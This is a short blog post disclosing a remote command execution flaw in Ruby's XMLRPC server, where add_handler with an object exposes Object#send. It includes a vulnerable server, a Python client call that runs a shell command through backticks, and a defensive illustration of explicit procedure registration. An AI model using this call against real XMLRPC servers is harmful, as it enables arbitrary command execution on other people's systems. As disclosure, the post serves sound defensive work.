Ruby XMLRPC Vulnerability
Looks like the Ruby XMLRPC implementation still has a vulnerability:
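
    #!/usr/bin/env ruby
    require 'xmlrpc/server'

    # Handler that is only meant to expose foo
    class TestHandler
      def foo
        42
      end
    end

    if __FILE__ == $0
      srv = XMLRPC::Server.new(5000)
      # Expose the handler object's methods under the "test." prefix
      srv.add_handler('test', TestHandler.new)
      srv.serve
    end
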
Connecting to it with the Python shell now does this:

    >>> from xmlrpclib import ServerProxy
    >>> p = ServerProxy("http://localhost:5000/")
    >>> p.test.send('foo')
    42
    >>> p.test.send('`', 'echo "Shit"')
    'Shit\n'

And something tells me there is no way to avoid this problem, so better just not use add_handler with a class. Explicit is better than implicit.
Update: after some googling I found someone who discovered the same: Ruby, Python, and an XML-RPC Server Arbitrary Shell Command Execution Flaw.
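
A self-contained model of implicit versus explicit registration, added here as an illustration (it is not code from the original post or from the xmlrpc library). `implicit_dispatch`, `ExplicitDispatcher`, `build_explicit` and `rejected?` are hypothetical names, and the `format` call is a harmless constructed probe showing that `send` reaches private Kernel methods.

```ruby
# Added illustration: a simplified model, not the xmlrpc library's dispatch code.
class TestHandler
  def foo
    42
  end
end

# Implicit: every public method of the registered object becomes callable,
# including inherited ones such as Object#send.
def implicit_dispatch(handler, name, args)
  raise NoMethodError, "no such method: #{name}" unless handler.respond_to?(name)
  handler.public_send(name, *args)
end

# Explicit: only procedures registered one by one, by full name, are callable.
class ExplicitDispatcher
  def initialize
    @procs = {}
  end

  def add_handler(name, &block)
    @procs[name.to_s] = block
  end

  def dispatch(name, args)
    handler = @procs[name.to_s]
    raise NoMethodError, "no such method: #{name}" unless handler
    handler.call(*args)
  end
end

# Builds a dispatcher that exports exactly one procedure, test.foo.
def build_explicit
  target = TestHandler.new
  dispatcher = ExplicitDispatcher.new
  dispatcher.add_handler('test.foo') { target.foo }
  dispatcher
end

# True when the given call is refused with NoMethodError.
def rejected?
  yield
  false
rescue NoMethodError
  true
end

if __FILE__ == $0
  puts implicit_dispatch(TestHandler.new, 'send', ['format', '%d', 7]).inspect
  puts rejected? { build_explicit.dispatch('test.send', ['foo']) }
end
```

With the real server, the explicit form is to register each procedure by its full name with a block, e.g. `srv.add_handler('test.foo') { 42 }`, instead of passing an object.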